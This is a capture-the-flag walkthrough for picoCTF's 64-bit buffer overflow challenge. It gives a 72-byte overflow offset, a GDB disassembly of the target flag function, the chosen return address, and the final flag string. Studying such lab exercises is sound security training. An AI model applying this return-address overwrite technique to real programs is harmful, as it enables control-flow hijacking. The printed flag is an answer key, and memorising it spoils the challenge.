Sanjay C / LT 'syreal' Jones
Overflow x64 code
Most problems before this are 32-bit x86. Now we'll consider 64-bit x86 which is a little different! Overflow the buffer and change the return address to the flag function in this program.
Download source.
nc saturn.picoctf.net 65512
- Now that we're in 64-bit, what used to be 4 bytes, now may be 8 bytes.
- Jump to the second instruction (the one after the first
push) in theflagfunction, if you're getting mysterious segmentation faults.
First I randomly ran file with inputs of different lengths to find the number of characters I could put in before it gave a segmentation fault. That number was 72.
Next we'll take a look at where the flag function is located. To do this, install GDB and gdb vuln. Once in GDB:
(gdb) disassemble flag
Dump of assembler code for function flag:
0x0000000000401236 <+0>: endbr64
0x000000000040123a <+4>: push %rbp
0x000000000040123b <+5>: mov %rsp,%rbp
0x000000000040123e <+8>: sub $0x50,%rsp
0x0000000000401242 <+12>: lea 0xdbf(%rip),%rsi # 0x402008
0x0000000000401249 <+19>: lea 0xdba(%rip),%rdi # 0x40200a
0x0000000000401250 <+26>: call 0x401130 <fopen@plt>
0x0000000000401255 <+31>: mov %rax,-0x8(%rbp)
0x0000000000401259 <+35>: cmpq $0x0,-0x8(%rbp)
0x000000000040125e <+40>: jne 0x401289 <flag+83>
0x0000000000401260 <+42>: lea 0xdac(%rip),%rdx # 0x402013
0x0000000000401267 <+49>: lea 0xdba(%rip),%rsi # 0x402028
0x000000000040126e <+56>: lea 0xde8(%rip),%rdi # 0x40205d
0x0000000000401275 <+63>: mov $0x0,%eax
0x000000000040127a <+68>: call 0x4010e0 <printf@plt>
0x000000000040127f <+73>: mov $0x0,%edi
0x0000000000401284 <+78>: call 0x401140 <exit@plt>
0x0000000000401289 <+83>: mov -0x8(%rbp),%rdx
0x000000000040128d <+87>: lea -0x50(%rbp),%rax
0x0000000000401291 <+91>: mov $0x40,%esi
0x0000000000401296 <+96>: mov %rax,%rdi
0x0000000000401299 <+99>: call 0x4010f0 <fgets@plt>
0x000000000040129e <+104>: lea -0x50(%rbp),%rax
0x00000000004012a2 <+108>: mov %rax,%rdi
0x00000000004012a5 <+111>: mov $0x0,%eax
0x00000000004012aa <+116>: call 0x4010e0 <printf@plt>
0x00000000004012af <+121>: nop
0x00000000004012b0 <+122>: leave
0x00000000004012b1 <+123>: ret
End of assembler dump.
We can see the flag function starts at 0x0000000000401236 but if we look at the second hint, it'll say to use the second instruction, so 0x000000000040123b <+5>: mov %rsp,%rbp at 0x000000000040123b. From there, we can write this script which was 100% necessary. Running the script will get you the flag.
picoCTF{b1663r_15_b3773r_011d4bd8}